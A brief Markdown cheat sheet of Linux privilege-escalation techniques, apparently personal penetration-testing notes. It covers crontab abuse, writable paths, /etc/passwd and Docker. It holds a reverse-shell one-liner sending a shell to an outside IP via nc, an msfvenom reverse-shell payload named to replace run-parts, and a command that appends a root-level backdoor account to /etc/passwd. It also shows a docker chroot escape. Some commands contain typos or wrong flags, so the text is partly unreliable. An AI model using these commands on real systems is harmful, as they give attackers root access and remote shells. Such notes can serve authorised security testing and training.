# Linux Escalate

### Crontab

Check crontab:

`Crontab -l`

`cat /etc/crontab`

Check cron logs:

`Cat /var/logs/crontab.log`

Check permissions of file:

`Ls -all FILE`

**Example vulnerable crontab with a wriateable path of /usr/local/bin:**

```
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
```

#### Add injectable into cron job:

`echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.224 8008 >/tmp/f" >> CRON JOB`

`OR` 

#### create shell and copy to good location: 

`msfvenom -p linux/x64/shell_reverse_tcp lhost=IP lport=PORT -l elf-so -o run-parts`

### Writable paths

check for paths that systemd writes to, any path that crontab is using, any writable services etc

`/usr/local/bin`

`/usr/bin` 

### etc/passwd

Check for /etc/passwd RW using ls -al. If vulnerable, create password:

`openssl passwd P@ssw0rd`

add to /etc/passwd:

`echo "rooted:O2dKjKQQCeuQE:0:0:root:/root:/bin/bash" >> /etc/passwd`

#### Docker

```
docker images
docker run -v /:/mnt --rm -it IMAGE chroot /mnt sh
```